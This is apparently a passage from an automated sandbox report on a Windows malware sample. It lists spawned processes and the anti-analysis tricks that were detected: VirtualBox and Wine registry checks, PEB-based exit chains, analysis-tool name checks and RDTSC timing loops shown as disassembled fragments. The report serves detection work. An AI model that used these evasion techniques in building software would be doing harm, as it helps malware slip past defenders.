                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Checks if the current machine is a virtual machine (disk enumeration)
                          Source: C:\Windows\SysWOW64\svchost.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9836
                          Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-11853
                          Switches to a custom stack to bypass stack traces
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                          Tries to detect sandboxes / dynamic malware analysis system (registry check)
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000002.3344552991.0000000000FFC000.00000004.00000001.01000000.00000010.sdmp, 1459165c97.exe, 0000002A.00000002.3347940274.0000000005750000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                          Source: skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000002.3344552991.0000000000FFC000.00000004.00000001.01000000.00000010.sdmp, 1459165c97.exe, 0000002A.00000002.3347940274.0000000005750000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                          Tries to detect virtualization through RDTSC time measurements
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119182B second address: 1191857 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD908C4C6EEh 0x00000008 jmp 00007FD908C4C6EBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD908C4C6ECh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191857 second address: 119185D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191F6C second address: 1191F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FD908C4C6F3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191F8A second address: 1191F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD9092ECB26h 0x0000000a popad 0x0000000b pop edi 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194ECD second address: 1194F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 2A9E6FA2h 0x0000000e push esi 0x0000000f mov edx, dword ptr [ebp+122D2D79h] 0x00000015 pop edi 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FD908C4C6E8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov dh, B6h 0x00000036 push 00000003h 0x00000038 mov edi, dword ptr [ebp+122D3019h] 0x0000003e call 00007FD908C4C6E9h 0x00000043 push eax 0x00000044 push edx 0x00000045 push edi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194F24 second address: 1194F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194F29 second address: 1194F4C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007FD908C4C6E6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD908C4C6F3h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194F4C second address: 1194F86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 jl 00007FD9092ECB28h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop esi 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c ja 00007FD9092ECB2Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD9092ECB30h 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194F86 second address: 1194F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194F99 second address: 1194FC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub dword ptr [ebp+122D25FCh], ebx 0x00000010 lea ebx, dword ptr [ebp+12449D1Eh] 0x00000016 mov dword ptr [ebp+122D2CB0h], edi 0x0000001c xchg eax, ebx 0x0000001d jg 00007FD9092ECB34h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11951CE second address: 11951DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD908C4C6EDh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11951DF second address: 1195221 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD9092ECB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f mov edi, dword ptr [ebp+122D2DC5h] 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D1DE9h], edi 0x0000001d call 00007FD9092ECB29h 0x00000022 pushad 0x00000023 jmp 00007FD9092ECB38h 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195221 second address: 119522D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119522D second address: 1195231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195231 second address: 1195261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jo 00007FD908C4C6F8h 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007FD908C4C6E6h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195261 second address: 1195265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117F355 second address: 117F368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD908C4C6EEh 0x00000009 pop edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117F368 second address: 117F36D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117F36D second address: 117F376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B246C second address: 11B2477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2477 second address: 11B247B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B247B second address: 11B247F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B247F second address: 11B248F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FD908C4C6E6h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2747 second address: 11B275F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B275F second address: 11B2763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2A50 second address: 11B2A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD9092ECB35h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2A6B second address: 11B2AA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6F4h 0x00000007 jg 00007FD908C4C6E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jo 00007FD908C4C712h 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 jp 00007FD908C4C6E6h 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2DBB second address: 11B2DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD9092ECB36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2DD7 second address: 11B2DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007FD908C4C6F5h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f jo 00007FD908C4C6EEh 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B30A9 second address: 11B30B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD9092ECB2Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B30B9 second address: 11B30DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD908C4C6F7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FD908C4C6E6h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B30DE second address: 11B30F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Ah 0x00000007 jmp 00007FD9092ECB2Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B30F9 second address: 11B30FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B30FF second address: 11B3107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B3107 second address: 11B310D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B3230 second address: 11B3234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B3DE7 second address: 11B3DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B3DEB second address: 11B3DF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4128 second address: 11B412D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1185CDB second address: 1185D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD9092ECB26h 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FD9092ECB26h 0x00000011 popad 0x00000012 push esi 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007FD9092ECB2Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
